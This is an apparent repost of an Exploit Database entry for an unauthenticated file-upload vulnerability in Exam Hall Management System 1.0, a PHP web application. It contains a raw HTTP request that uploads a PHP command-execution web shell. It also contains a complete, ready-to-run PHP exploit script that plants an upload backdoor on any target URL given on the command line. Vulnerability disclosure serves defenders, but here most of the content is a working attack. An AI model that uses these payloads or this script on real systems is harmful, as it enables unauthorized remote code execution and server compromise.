Exam Hall Management System 1.0 – Unrestricted File Upload (Unauthenticated)

• Exploit Database
• 18 阅读

• 作者： Thamer Almohammadi
  日期： 2021-07-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50103/

• # Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)
  # Date: 06/07/2021
  # Exploit Author: Thamer Almohammadi (@Thamerz88)
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html
  # Version: 1.0
  # Tested on: Kali Linux
  
  # Proof of Concept :
  
  1- Send Request to /pages/save_user.php.
  2- Find your shell.php file path and try any command.
  
  
  ################################## REQUEST ###############################
  POST /pages/save_user.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877
  Content-Length: 369
  -----------------------------3767690350396265302394702877
  Content-Disposition: form-data; name="image"; filename="shell.php"
  Content-Type: application/x-php
  <?php
  
  system($_GET['cmd']);
  
  ?>
  -----------------------------3767690350396265302394702877
  
  Content-Disposition: form-data; name="btn_save"
  
  -----------------------------3767690350396265302394702877--
  
  
  
  
  ################################## RESPONSE #############################
  HTTP/1.1 200 OK
  Date: Tue, 06 Jul 2021 02:16:18 GMT
  Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1
  X-Powered-By: PHP/7.3.28
  Content-Length: 1529
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  
  
  ################################## Exploit #############################
  <?php
  // Coder By Thamer Almohammadi(@Thamerz88);
  function exploit($scheme,$host,$path,$shell){
  $url=$scheme."://".$host.$path;
  $content='<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>';
  $data= "-----------------------------3767690350396265302394702877\r\n";
  $data .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n";
  $data .= "Content-Type: image/gif\r\n\r\n";
  $data .= "$content\r\n";
  $data .= "-----------------------------3767690350396265302394702877\r\n";
  
  $data.= "-----------------------------3767690350396265302394702877\r\n";
  $data .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n";
  $data .= "\r\n";
  $data .= "-----------------------------3767690350396265302394702877\r\n";
  
  $packet = "POST $path/pages/save_user.php HTTP/1.0\r\n";
  $packet .= "Host: $host\r\n";
  $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
  $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n";
  $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
  $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  $packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n";
  $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n";
  $packet .= $data;
  $packet .= "\r\n";
  send($host, $packet);
  sleep(2);
  check($url,$shell);
  }
  function send($host, $packet)
  {
  if ($connect = @fsockopen ($host, 80, $x, $y, 3))
  {
  @fputs ($connect, $packet);
  @fclose ($connect);
  }
  
  }
  
  function check($url,$shell){
  $check=file_get_contents($url."/uploadImage/Profile/".$shell);
  $preg=preg_match('/(File To Upload)/', $check, $output);
  if($output[0] == "File To Upload"){
  echo "[+] Upload shell successfully.. :D\n"; 
  echo "[+] Link ". $url."/uploadImage/Profile/".$shell."\n"; 
  }
  else{ //Exploit Failed
  echo "[-] Exploit Failed..\n"; 
  }
  
  
  }
  $options=getopt("u:s:");
  if(!isset($options['u'], $options['s'])) 
  die("\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n 
  -u http://target.com = Target URL ..
  -s shell.php = Shell Name ..\n\n");
  $url=$options["u"];
  $shell=$options["s"];
  $parse=parse_url($url);
  $host=$parse['host'];
  $path=$parse['path'];
  $scheme=$parse['scheme'];
  exploit($scheme,$host,$path,$shell);
  
  ?>